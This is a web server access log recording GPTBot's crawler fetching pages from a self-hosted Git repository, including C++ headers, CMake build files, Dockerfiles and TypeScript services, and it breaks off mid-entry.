+[17/Feb/2026:15:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13643] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12946] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13029] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11172] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13029] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12705] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11899] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12020] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12636] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9997] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12017] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService" [Client 74.7.227.38] [Length 33069] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" +[17/Feb/2026:15:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj" [Client 74.7.227.38] [Length 32491] [Gzip 7.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:15:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15953] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:15:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" +[17/Feb/2026:15:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13164] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:15:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:15:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" +[17/Feb/2026:15:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 17993] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 19603] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11631] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" +[17/Feb/2026:15:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore?display=source" [Client 74.7.227.38] [Length 11127] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" +[17/Feb/2026:15:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12476] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8483] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostissues&state=open" +[17/Feb/2026:15:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8477] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:15:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11296] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11295] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12995] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12949] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12949] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 